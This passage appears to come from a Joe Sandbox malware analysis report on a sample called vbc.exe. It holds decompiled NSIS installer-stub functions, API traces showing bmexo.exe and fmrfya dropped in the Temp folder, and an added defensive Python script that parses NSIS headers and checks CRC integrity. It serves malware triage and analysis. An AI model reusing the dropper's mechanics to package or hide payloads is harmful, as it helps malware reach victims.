                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                          • API String ID: 2803837635-2435864027
                                          • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                          • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                                          • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                          • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%
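The routine at 0x004030DE is the NSIS installer stub's header scan: it resolves its own image path (GetModuleFileNameW), opens it (CreateFileW, GetFileSize), walks the file looking for the "Null", "soft", "Inst" magic, and reports "Installer integrity check has failed" when the stored CRC does not match (the "NSIS Error" caption in the lstrcpynW subcall of the next routine is the same stub). The Python below is an added triage example, not code from this report, from the sample, or from the NSIS project: it locates and parses that firstheader and repeats the stub's CRC check on a constructed stand-in file. The header layout and constants (FH_SIG 0xDEADBEEF, the flag bits, the 512-byte read stride, CRC32 over everything before the trailing four bytes) follow the public NSIS exehead source; build_sample and every byte it emits are constructed for the demonstration and do not come from the analysed file.

```python
import struct
import zlib

# NSIS firstheader layout, taken from the public NSIS source (Source/exehead/fileform.h):
#   int flags; int siginfo; int nsinst[3]; int length_of_header; int length_of_all_following_data;
FH_SIZE = 28
FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"     # nsinst[0..2] == "Null", "soft", "Inst"
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4            # set by "CRCCheck off" at build time
FH_FLAGS_FORCE_CRC = 8         # set by "CRCCheck force"
FH_FLAGS_MASK = 15
SCAN_STEP = 512                # the stub reads 512-byte chunks until one starts with the header


def find_firstheader(data: bytes):
    """Offset of the NSIS firstheader, or None.

    Mirrors the stub's test: the header sits at a 512-byte boundary, has no unknown
    flag bits, carries the 0xDEADBEEF signature and the "NullsoftInst" magic."""
    for off in range(0, len(data) - FH_SIZE + 1, SCAN_STEP):
        flags, sig = struct.unpack_from("<II", data, off)
        if (flags & ~FH_FLAGS_MASK) == 0 and sig == FH_SIG and data[off + 8:off + 20] == FH_MAGIC:
            return off
    return None


def parse_firstheader(data: bytes, off: int) -> dict:
    flags, _sig, hdr_len, total_len = struct.unpack_from("<II12xII", data, off)
    return {
        "flags": flags,
        "uninstaller": bool(flags & FH_FLAGS_UNINSTALL),
        "silent": bool(flags & FH_FLAGS_SILENT),
        "length_of_header": hdr_len,
        "length_of_all_following_data": total_len,
    }


def check_crc(data: bytes, off: int, total_len: int) -> bool:
    """The stored CRC32 is the last 4 bytes of the data block and covers every byte of the
    file before it, PE stub included; a truncated download therefore fails this check."""
    crc_pos = off + total_len - 4
    if crc_pos < off + FH_SIZE or crc_pos + 4 > len(data):
        return False
    stored, = struct.unpack_from("<I", data, crc_pos)
    return (zlib.crc32(data[:crc_pos]) & 0xFFFFFFFF) == stored


def triage(data: bytes) -> dict:
    """Identify an NSIS package and report what the stub's integrity check would decide."""
    off = find_firstheader(data)
    if off is None:
        return {"nsis": False}
    hdr = parse_firstheader(data, off)
    total_len = hdr["length_of_all_following_data"]
    result = {"nsis": True, "offset": off, **hdr}
    result["truncated"] = len(data) - off < total_len
    # "CRCCheck off" skips the check unless the author forced it on
    result["crc_checked"] = bool(hdr["flags"] & FH_FLAGS_FORCE_CRC) or not (hdr["flags"] & FH_FLAGS_NO_CRC)
    if result["crc_checked"]:
        result["crc_ok"] = (not result["truncated"]) and check_crc(data, off, total_len)
    else:
        result["crc_ok"] = None
    return result


def build_sample(corrupt: bool = False, flags: int = 0) -> bytes:
    """Constructed stand-in for an NSIS-packed executable (not a real sample): 1024 filler
    bytes where the PE stub would be, a firstheader, a made-up data block, the CRC32."""
    stub = b"MZ" + b"\x00" * 1022
    payload = bytes(range(69))                       # hypothetical compressed data block
    total_len = FH_SIZE + len(payload) + 4           # header + data + trailing CRC
    header = struct.pack("<II12sII", flags, FH_SIG, FH_MAGIC, 0x40, total_len)
    body = stub + header + payload
    data = body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    if corrupt:
        # flip one byte inside the data block after the CRC was computed
        pos = len(stub) + FH_SIZE + 3
        data = data[:pos] + bytes([data[pos] ^ 0xFF]) + data[pos + 1:]
    return data


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(triage(blob))
```

Run it against the dropped executable to confirm the file is an NSIS package and whether its data block is intact before handing it to 7-Zip or a dedicated NSIS extractor; a "truncated" or "crc_ok: False" result means the stub would have shown the integrity-check error instead of dropping anything, which matters when a sandbox run ends early.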

                                          Control-flow Graph: basic-block edge list for the function at 0040176f (Executed / Not Executed legend); rendered graph not reproduced here.
                                          C-Code - Quality: 77%
                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                                          				void* __esi;
                                          				void* _t35;
                                          				void* _t43;
                                          				void* _t45;
                                          				FILETIME* _t51;
                                          				FILETIME* _t64;
                                          				void* _t66;
                                          				signed int _t72;
                                          				FILETIME* _t73;
                                          				FILETIME* _t77;
                                          				signed int _t79;
                                          				WCHAR* _t81;
                                          				void* _t83;
                                          				void* _t84;
                                          				void* _t86;
                                          
                                          				_t77 = __ebx;
                                          				 *(_t86 - 8) = E00402DA6(0x31);
                                          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                          				_t35 = E00405FB4( *(_t86 - 8));
                                          				_push( *(_t86 - 8));
                                          				_t81 = L"C:\\U";
                                          				if(_t35 == 0) {
                                          					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
                                          				} else {
                                          					E0040666E();
                                          				}
                                          				E004068F5(_t81);
                                          				while(1) {
                                          					__eflags =  *(_t86 + 8) - 3;
                                          					if( *(_t86 + 8) >= 3) {
                                          						_t66 = E004069A4(_t81);
                                          						_t79 = 0;
                                          						__eflags = _t66 - _t77;
                                          						if(_t66 != _t77) {
                                          							_t73 = _t66 + 0x14;
                                          							__eflags = _t73;
                                          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                          						}
                                          						asm("sbb eax, eax");
                                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                          						__eflags = _t72;
                                          						 *(_t86 + 8) = _t72;
                                          					}
                                          					__eflags =  *(_t86 + 8) - _t77;
                                          					if( *(_t86 + 8) == _t77) {
                                          						E00406139(_t81);
                                          					}
                                          					__eflags =  *(_t86 + 8) - 1;
                                          					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                          					__eflags = _t43 - 0xffffffff;
                                          					 *(_t86 - 0x38) = _t43;
                                          					if(_t43 != 0xffffffff) {
                                          						break;
                                          					}
                                          					__eflags =  *(_t86 + 8) - _t77;
                                          					if( *(_t86 + 8) != _t77) {
                                          						E004056D0(0xffffffe2,  *(_t86 - 8));
                                          						__eflags =  *(_t86 + 8) - 2;
                                          						if(__eflags == 0) {
                                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                                          						}
                                          						L31:
                                          						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
                                          						__eflags =  *0x7a8b28;
                                          						goto L32;
                                          					} else {
                                          						E0040666E(0x40b5f8, _t83);
                                          						E0040666E(_t83, _t81);
                                          						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                          						E0040666E(_t83, 0x40b5f8);
                                          						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                          						__eflags = _t64;
                                          						if(_t64 == 0) {
                                          							continue;
                                          						} else {
                                          							__eflags = _t64 == 1;
                                          							if(_t64 == 1) {
                                          								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
                                          								L32:
                                          								_t51 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_push(_t81);
                                          								_push(0xfffffffa);
                                          								E004056D0();
                                          								L29:
                                          								_t51 = 0x7fffffff;
                                          							}
                                          						}
                                          					}
                                          					L33:
                                          					return _t51;
                                          				}
                                          				E004056D0(0xffffffea,  *(_t86 - 8));
                                          				 *0x7a8b54 =  *0x7a8b54 + 1;
                                          				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                          				 *0x7a8b54 =  *0x7a8b54 - 1;
                                          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                          				_t84 = _t45;
                                          				if( *(_t86 - 0x24) != 0xffffffff) {
                                          					L22:
                                          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                          				} else {
                                          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                          						goto L22;
                                          					}
                                          				}
                                          				CloseHandle( *(_t86 - 0x38)); // executed
                                          				__eflags = _t84 - _t77;
                                          				if(_t84 >= _t77) {
                                          					goto L31;
                                          				} else {
                                          					__eflags = _t84 - 0xfffffffe;
                                          					if(_t84 != 0xfffffffe) {
                                          						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
                                          					} else {
                                          						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
                                          						lstrcatW(_t81,  *(_t86 - 8));
                                          					}
                                          					_push(0x200010);
                                          					_push(_t81);
                                          					E00405CCE();
                                          					goto L29;
                                          				}
                                          				goto L33;
                                          			}

                                          APIs
                                          • lstrcatW.KERNEL32 ref: 004017B0
                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,00000000,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,007B4000,?,?,00000031), ref: 004017D5
                                            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 1941528284-1009698528
                                          • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                          • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                                          • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                          • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph: basic-block edge list for the function at 0040347f (Executed / Not Executed legend); rendered graph not reproduced here.
                                          C-Code - Quality: 93%
                                          			E0040347F(intOrPtr _a4) {
                                          				intOrPtr _t11;
                                          				signed int _t12;
                                          				void* _t15;
                                          				long _t16;
                                          				void* _t18;
                                          				intOrPtr _t30;
                                          				intOrPtr _t33;
                                          				intOrPtr _t35;
                                          				void* _t36;
                                          				intOrPtr _t48;
                                          
                                          				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
                                          				 *0x7a8aac = GetTickCount() + 0x1f4;
                                          				if(_t33 <= 0) {
                                          					L22:
                                          					E0040302E(1);
                                          					return 0;
                                          				}
                                          				E004035FE( *0x79f744);
                                          				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                          				 *0x79f740 = _t33;
                                          				 *0x79f730 = 0;
                                          				while(1) {
                                          					_t30 = 0x4000;
                                          					_t11 =  *0x79f738 -  *0x79f744;
                                          					if(_t11 <= 0x4000) {
                                          						_t30 = _t11;
                                          					}
                                          					_t12 = E004035E8(0x793730, _t30);
                                          					if(_t12 == 0) {
                                          						break;
                                          					}
                                          					 *0x79f744 =  *0x79f744 + _t30;
                                          					 *0x40ce68 = 0x793730;
                                          					 *0x40ce6c = _t30;
					L6:
                                          					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
                                          						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
                                          						E0040302E(0);
                                          					}
                                          					 *0x40ce70 = 0x78b730;
                                          					 *0x40ce74 = 0x8000;
                                          					if(E00406B96(?str?) < 0) {
                                          						goto L20;
                                          					}
                                          					_t35 =  *0x40ce70; // 0x78e743
                                          					_t36 = _t35 - 0x78b730;
                                          					if(_t36 == 0) {
                                          						__eflags =  *0x40ce6c; // 0x0
                                          						if(__eflags != 0) {
                                          							goto L20;
                                          						}
                                          						__eflags = _t30;
                                          						if(_t30 == 0) {
                                          							goto L20;
                                          						}
                                          						L16:
                                          						_t16 =  *0x79f734;
                                          						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                          							continue;
                                          						}
                                          						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                          						goto L22;
                                          					}
                                          					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
                                          					if(_t18 == 0) {
                                          						_push(0xfffffffe);
                                          						L21:
                                          						_pop(_t15);
                                          						return _t15;
                                          					}
                                          					 *0x40ce60 =  *0x40ce60 + _t36;
                                          					_t48 =  *0x40ce6c; // 0x0
                                          					if(_t48 != 0) {
                                          						goto L6;
                                          					}
                                          					goto L16;
                                          					L20:
                                          					_push(0xfffffffd);
                                          					goto L21;
                                          				}
                                          				return _t12 | 0xffffffff;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493
                                            • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,{ky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer$CountTick
                                          • String ID: 07y$Cx${ky
                                          • API String ID: 1092082344-2003166005
                                          • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                          • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                                          • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                          • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 557 4069cb-4069eb GetSystemDirectoryW 558 4069ed 557->558 559 4069ef-4069f1 557->559 558->559 560 406a02-406a04 559->560 561 4069f3-4069fc 559->561 563 406a05-406a38 wsprintfW LoadLibraryExW 560->563 561->560 562 4069fe-406a00 561->562 562->563
                                          C-Code - Quality: 100%
                                          			E004069CB(intOrPtr _a4) {
                                          				short _v576;
                                          				signed int _t13;
                                          				struct HINSTANCE__* _t17;
                                          				signed int _t19;
                                          				void* _t24;
                                          
                                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                          				if(_t13 > 0x104) {
                                          					_t13 = 0;
                                          				}
                                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                          					_t19 = 1;
                                          				} else {
                                          					_t19 = 0;
                                          				}
                                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                          				return _t17;
                                          			}

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                          • wsprintfW.USER32 ref: 00406A1D
                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME$\
                                          • API String ID: 2200240437-1946221925
                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 564 405b9f-405bea CreateDirectoryW 565 405bf0-405bfd GetLastError 564->565 566 405bec-405bee 564->566 567 405c17-405c19 565->567 568 405bff-405c13 SetFileSecurityW 565->568 566->567 568->566 569 405c15 GetLastError 568->569 569->567
                                          C-Code - Quality: 100%
                                          			E00405B9F(WCHAR* _a4) {
                                          				struct _SECURITY_ATTRIBUTES _v16;
                                          				struct _SECURITY_DESCRIPTOR _v36;
                                          				int _t22;
                                          				long _t23;
                                          
                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                          				_v36.Owner = 0x4083f8;
                                          				_v36.Group = 0x4083f8;
                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                          				_v16.lpSecurityDescriptor =  &_v36;
                                          				_v36.Revision = 1;
                                          				_v36.Control = 4;
                                          				_v36.Dacl = 0x4083e8;
                                          				_v16.nLength = 0xc;
                                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                          				if(_t22 != 0) {
                                          					L1:
                                          					return 0;
                                          				}
                                          				_t23 = GetLastError();
                                          				if(_t23 == 0xb7) {
                                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                          						goto L1;
                                          					}
                                          					return GetLastError();
                                          				}
                                          				return _t23;
                                          			}

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                          • GetLastError.KERNEL32 ref: 00405BF6
                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                                          • GetLastError.KERNEL32 ref: 00405C15
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 3449924974-4017390910
                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 570 40618d-406199 571 40619a-4061ce GetTickCount GetTempFileNameW 570->571 572 4061d0-4061d2 571->572 573 4061dd-4061df 571->573 572->571 574 4061d4 572->574 575 4061d7-4061da 573->575 574->575
                                          C-Code - Quality: 100%
                                          			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				intOrPtr _v8;
                                          				short _v12;
                                          				short _t12;
                                          				intOrPtr _t13;
                                          				signed int _t14;
                                          				WCHAR* _t17;
                                          				signed int _t19;
                                          				signed short _t23;
                                          				WCHAR* _t26;
                                          
                                          				_t26 = _a4;
                                          				_t23 = 0x64;
                                          				while(1) {
                                          					_t12 =  *L"nsa"; // 0x73006e
                                          					_t23 = _t23 - 1;
                                          					_v12 = _t12;
                                          					_t13 =  *0x40a5ac; // 0x61
                                          					_v8 = _t13;
                                          					_t14 = GetTickCount();
                                          					_t19 = 0x1a;
                                          					_v8 = _v8 + _t14 % _t19;
                                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                          					if(_t17 != 0) {
                                          						break;
                                          					}
                                          					if(_t23 != 0) {
                                          						continue;
                                          					} else {
                                          						 *_t26 =  *_t26 & _t23;
                                          					}
                                          					L4:
                                          					return _t17;
                                          				}
                                          				_t17 = _t26;
                                          				goto L4;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-4262883142
                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
